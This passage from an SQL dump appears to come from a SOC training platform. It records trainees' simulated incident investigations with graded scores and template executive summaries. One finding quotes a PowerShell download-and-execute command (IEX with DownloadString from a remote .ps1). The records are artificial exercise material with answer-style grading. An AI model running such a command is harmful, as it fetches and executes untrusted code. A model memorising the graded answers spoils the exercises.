(Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:25:32.586Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/2)\",\"missed_items\":[\"block_url\",\"reset_credentials\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-02-22 10:22:37', '2026-02-28 21:00:00', 0, NULL),
(298, 177, 364, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"isolate_host\",\"escalate\",\"collect_forensics\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:02:48 PM\\nALERT: Suspicious Web Shell Detected on IIS Server [OP: Operation Soft Cell]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.45\\n- [FILENAME] shell.aspx\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:33:25.129Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:32:11', '2026-02-28 21:00:00', 0, NULL),
(299, 177, 365, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-9e107d9d\",\"cmd-1\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:05:52 PM\\nALERT: Anomalous PowerShell Activity Observed [OP: Operation Soft Cell]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 9e107d9d372bb6826bd81d3542a419d6\\n- [COMMAND] powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\"\\n- [IP] 10.0.0.17\\n- [FILENAME] malicious.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:36:28.762Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:33:25', '2026-02-28 21:00:00', 0, NULL),
(300, 177, 366, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_2\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:07:44 PM\\nALERT: Creation of Hidden Scheduled Task [OP: Operation Soft Cell]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 203.0.113.54\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:38:21.142Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:36:28', '2026-02-28 21:00:00', 0, NULL),
(301, 177, 367, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.23\",\"ip-192.168.1.10\",\"hash-d41d8cd9\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:11:28 PM\\nALERT: Unauthorized Access to Network Map [OP: Operation Soft Cell]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 198.51.100.23\\n- [IP] 192.168.1.10\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] network_scan_tool.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:42:05.692Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:38:21', '2026-02-28 21:00:00', 0, NULL),
(302, 177, 368, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.15.23\",\"ip-203.0.113.45\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:14:11 PM\\nALERT: Exfiltration of Call Detail Records Detected [OP: Operation Soft Cell]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.15.23\\n- [IP] 203.0.113.45\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [FILENAME] target_CDR_records.zip\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:44:48.507Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:42:05', '2026-02-28 21:00:00', 0, NULL),
(303, 177, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:28:14 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:58:51.044Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:56:28', '2026-02-28 21:00:00', 0, NULL),
(304, 177, 270, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:30:36 PM\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T11:01:15.318Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 10:58:51', '2026-02-28 21:00:00', 0, NULL),
(305, 177, 271, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:34:49 PM\\nALERT: Lateral Movement to OT Network [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 10.0.0.5\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [USERNAME] jdoe\\n- [IP] 203.0.113.55\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T11:05:26.381Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"isolate_host\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 11:01:15', '2026-02-28 21:00:00', 0, NULL),
(306, 177, 272, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"escalate\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:37:57 PM\\nALERT: SCADA System Compromise [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.20\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [IP] 203.0.113.45\\n- [FILENAME] malicious_script.sh\\n- [USERNAME] unauthorized_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T11:08:36.065Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 11:05:26', '2026-02-28 21:00:00', 0, NULL),
(307, 177, 274, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-22 11:08:55', '2026-02-22 11:08:55', 0, NULL),
(308, 189, 279, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"hash-b1946ac9\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 2:48:58 AM\\nALERT: Execution of Malicious Code [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] malicious.dll\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-23T01:49:31.601Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 01:32:39', '2026-02-28 21:00:00', 0, NULL),
(309, 189, 280, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-abc123de\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 3:02:11 AM\\nALERT: Establish Persistence [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] abc123def4567890abc123def4567890\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou Mane\",\"submitted_at\":\"2026-02-23T02:02:24.889Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 01:49:31', '2026-02-28 21:00:00', 0, NULL),
(310, 189, 281, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.55\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"artifact_4\",\"artifact_6\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 3:15:04 AM\\nALERT: Lateral Movement and Data Exfiltration [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.55\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] confidential_data.xlsx\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-23T02:15:23.319Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 02:02:24', '2026-02-28 21:00:00', 0, NULL),
(311, 189, 285, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.34\",\"ip-10.0.2.15\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 3:35:15 AM\\nALERT: Spear-Phishing Email Campaign Detected [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.92.220.34\\n- [IP] 10.0.2.15\\n- [EMAIL] john.doe@fakeorg.com\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [URL] http://malicious-link.com/login\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-23T02:35:28.208Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 02:15:42', '2026-02-28 21:00:00', 0, NULL),
(312, 189, 286, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.14.22.5\",\"ip-203.0.113.45\",\"hash-d41d8cd9\",\"domain-http://login\",\"domain-login-secure\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 3:53:35 AM\\nALERT: Malicious Domain Infrastructure Identified [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.14.22.5\\n- [IP] 203.0.113.45\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [DOMAIN] http://login-secure-portal.com/login\\n- [DOMAIN] login-secure-portal.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou mane\",\"submitted_at\":\"2026-02-23T02:53:57.960Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 02:35:28', '2026-02-28 21:00:00', 0, NULL),
(313, 189, 287, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.25\",\"hash-e99a18c4\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 4:08:23 AM\\nALERT: OAuth Token Abuse Technique Detected [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.25\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [USERNAME] j.doe@company.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou mane\",\"submitted_at\":\"2026-02-23T03:08:46.603Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 02:53:57', '2026-02-28 21:00:00', 0, NULL),
(314, 189, 288, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-185.92.220.50\",\"ip-192.168.1.105\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_hash\",\"reset_credentials\",\"block_ip\",\"isolate_host\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 4:12:20 AM\\nALERT: Disinformation Campaign Planning Uncovered [OP: Operation Phantom Ballot]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 185.92.220.50\\n- [IP] 192.168.1.105\\n- [HASH] 8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\n- [FILENAME] election_strategy_2023.pdf\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-23T03:12:26.166Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 03:08:46', '2026-02-28 21:00:00', 0, NULL),
(315, 189, 289, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"artifact_1\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:23:48 AM\\nALERT: Phishing Email Detected [OP: Operation Black Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [EMAIL] attacker@example.com\\n- [URL] http://malicious-link.com/download\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] update-instructions.html\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED:Amadou MANE\",\"submitted_at\":\"2026-02-27T02:24:38.682Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-23 03:12:43', '2026-02-28 21:00:00', 0, NULL),
(316, 198, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-23 23:51:06', '2026-02-23 23:51:06', 0, NULL),
(317, 199, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-23 23:52:05', '2026-02-23 23:52:05', 0, NULL),
(318, 140, 744, 'investigating', NULL, NULL, NULL, NULL, '2026-02-24 07:28:45', '2026-02-24 04:20:45', '2026-02-24 04:20:45', 0, NULL),
(319, 209, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-25 11:04:36', '2026-02-25 11:04:36', 0, NULL),
(320, 174, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-26 04:41:54', '2026-02-26 04:41:54', 0, NULL),
(321, 174, 842, 'investigating', NULL, NULL, NULL, NULL, '2026-02-26 07:59:28', '2026-02-26 04:49:28', '2026-02-26 04:49:28', 0, NULL),
(322, 109, 1305, 'investigating', NULL, NULL, NULL, NULL, '2026-02-26 17:09:46', '2026-02-26 14:03:46', '2026-02-26 14:03:46', 0, NULL),
(323, 213, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"escalate\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 26/2/2026, 18:29:16\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T21:29:19.540Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:11:50', '2026-02-28 21:00:00', 0, NULL),
